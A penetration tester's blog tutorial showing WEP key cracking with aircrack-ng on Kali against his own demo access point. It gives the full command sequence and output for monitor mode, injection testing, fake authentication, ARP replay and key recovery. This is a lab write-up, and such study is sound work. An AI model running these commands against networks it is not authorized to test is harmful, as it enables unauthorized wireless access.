WEP Cracking with Aircrack-ng in Kali

While I wasn't able to find any in my neighborhood, I setup a demo AP for some WEP cracking at home.

For those of you that didn't know, I recently picked up a new alfa card, so it was time to give it a test drive.

Setup

First, I setup a 2nd SSID on my AP that would support WEP, and generated a random 128-bit key.

Once I configured the AP, I ran airodump to find the new network. Note that the encrypt flag will filter out my results, and only show me WEP networks.

root@kali:~/wep# airodump-ng wlan0mon --encrypt WEP

WEP Cracking - AP

Monitoring

After I found the new SSID, I restarted my monitoring interface on channel 1.

root@kali:~/wep#  airmon-ng stop wlan0mon

PHY    Interface    Driver        Chipset

phy0    wlan0mon    ath9k_htc    Atheros Communications, Inc. AR9271 802.11n

        (mac80211 station mode vif enabled on [phy0]wlan0)

        (mac80211 monitor mode vif disabled for [phy0]wlan0mon)

root@kali:~/wep#  airmon-ng start wlan0 1

Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

  PID Name
  431 NetworkManager
  869 wpa_supplicant
 1747 dhclient

PHY    Interface    Driver        Chipset

phy0    wlan0mon    ath9k_htc    Atheros Communications, Inc. AR9271 802.11n

Once the monitoring interface was back up, it was time to test packet injection.

root@kali:~/wep#  aireplay-ng -9 -e WEPisBAD -a 06:xx:xx:xx:xx:xx wlan0mon
11:34:22  Waiting for beacon frame (BSSID: 06:xx:xx:xx:xx:xx) on channel 1
11:34:22  Trying broadcast probe requests...
11:34:22  Injection is working!
11:34:24  Found 1 AP

11:34:24  Trying directed probe requests...
11:34:24  06:xx:xx:xx:xx:xx - channel: 1 - 'WEPisBAD'
11:34:25  Ping (min/avg/max): 2.423ms/15.027ms/29.647ms Power: -44.93
11:34:25  30/30: 100%

With packet injecting possible (at a 100% rate), I started airodump again to begin capturing IVs.

root@kali:~/wep#  airodump-ng -c 1 --bssid 06:xx:xx:xx:xx:xx -w output wlan0mon

WEP Cracking - Airodump

Authentication

The next step was to perform a fake authentication with the AP. The reason for this is that the AP will not accept packets from a MAC address that it does not already recognize. Since I do not know the WEP key yet, aireplay can fake an authentication for me.

root@kali:~/wep#  aireplay-ng -1 0 -e WEPisBAD -a 06:xx:xx:xx:xx:xx -h 00:xx:xx:xx:xx:xx wlan0mon
11:33:51  Waiting for beacon frame (BSSID: 06:xx:xx:xx:xx:xx) on channel 1

11:33:51  Sending Authentication Request (Open System) [ACK]
11:33:51  Authentication successful
11:33:51  Sending Association Request [ACK]
11:33:51  Association successful :-) (AID: 1)

Attack

Once the fake authentication was complete, I was able to start generating traffic. In this case, I used aireplay in ARP replay mode. This will allow aireplay to listen for ARP request packets, and then inject them back into the network. This will allow us to obtain a lot of IVs in a short period.

root@kali:~/wep#  aireplay-ng --arpreplay -b 06:xx:xx:xx:xx:xx -h 00:xx:xx:xx:xx:xx wlan0mon
11:35:44  Waiting for beacon frame (BSSID: 06:xx:xx:xx:xx:xx) on channel 1
Saving ARP requests in replay_arp-0318-113544.cap
You should also start airodump-ng to capture replies.
Read 4036 packets (got 1 ARP requests and 128 ACKs), sent 129 packets...(498 pps)
Read 4147 packets (got 1 ARP requests and 178 ACKs), sent 179 packets...(499 pps)
Read 4255 packets (got 1 ARP requests and 228 ACKs), sent 230 packets...(501 pps)
Read 4362 packets (got 1 ARP requests and 278 ACKs), sent 280 packets...(501 pps)
Read 4471 packets (got 1 ARP requests and 329 ACKs), sent 329 packets...(499 pps)
Read 4574 packets (got 1 ARP requests and 378 ACKs), sent 379 packets...(499 pps)
Read 4679 packets (got 1 ARP requests and 427 ACKs), sent 429 packets...(499 pps)
Read 4790 packets (got 1 ARP requests and 479 ACKs), sent 480 packets...(500 pps)
Read 4895 packets (got 1 ARP requests and 528 ACKs), sent 530 packets...(500 pps)
Read 5003 packets (got 1 ARP requests and 578 ACKs), sent 579 packets...(499 pps)
Read 5111 packets (got 1 ARP requests and 629 ACKs), sent 629 packets...(499 pps)
Read 5217 packets (got 1 ARP requests and 678 ACKs), sent 680 packets...(500 pps)

WEP Cracking - ARP Replay

After awhile (around 5000 data packets), I tried to crack the key. As you can see, this did not work (mostly because I set a random 128-bit key to start). That said, aircrack will retry the attack every 5000 IVs until it is able to crack the key.

root@kali:~/wep#  aircrack-ng output-0*.cap
Opening output-01.cap
Read 138001 packets.

   #  BSSID              ESSID                     Encryption

   1  06:xx:xx:xx:xx:xx  WEPisBAD                  WEP (6710 IVs)

Choosing first network as target.

Opening output-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 6735 ivs.


                                 Aircrack-ng 1.2 rc4


                 [00:00:04] Tested 168121 keys (got 7125 IVs)

   KB    depth   byte(vote)
    0   17/ 18   E4(9728) 13(9472) 29(9472) 2E(9472) 86(9472)  40)
    1   15/ 19   F6(9728) 18(9472) 29(9472) 2F(9472) 50(9472) )
    2    4/  5   D7(10752) 33(10240) 53(10240) AB(10240) D4(10240)
    3   10/  3   9D(9984) 73(9728) 76(9728) 78(9728) 7E(9728) 84)
    4   21/  4   C1(9728) 08(9472) 2C(9472) 4D(9472) 8E(9472) 4)

Failed. Next try with 10000 IVs.

Once I had just over 34,000 IVs, aircrack was able to get the WEP key!

WEP Cracking - Key Obtained

58:46:7E:7D:5F:7D:2C:6C:3A:46:5D:5A:6E

Connecting

To verify the key was correct, I attempted to authenticate using the networking UI.

WEP Cracking - Connecting

After a few seconds, I connected, and iwconfig showed my access!

WEP Cracking - Connected

Conclusion

While WEP cracking is a little less relevant nowadays, it was still a fun exercise to try out my new toy. For more information about this attack, and many more, I recommend the aircrack wiki.

doyler on Githubdoyler on Twitter
doyler
Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he's done it all. To show for it, he has obtained an OSCE, OSCP, eCPPT, GXPN, eWPT, eWPTX, SLAE, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!

He currently serves as a Senior Penetration tester for Avalara, and his previous position was a Principal Penetration Testing Consultant for Secureworks.

When he's not figuring out what cert to get next or side project to work on, he enjoys playing video games, traveling, and watching sports.

Leave a Comment

Filed under Security Not Included

Leave a Reply

Your email address will not be published. Required fields are marked *

*

This site uses Akismet to reduce spam. Learn how your comment data is processed.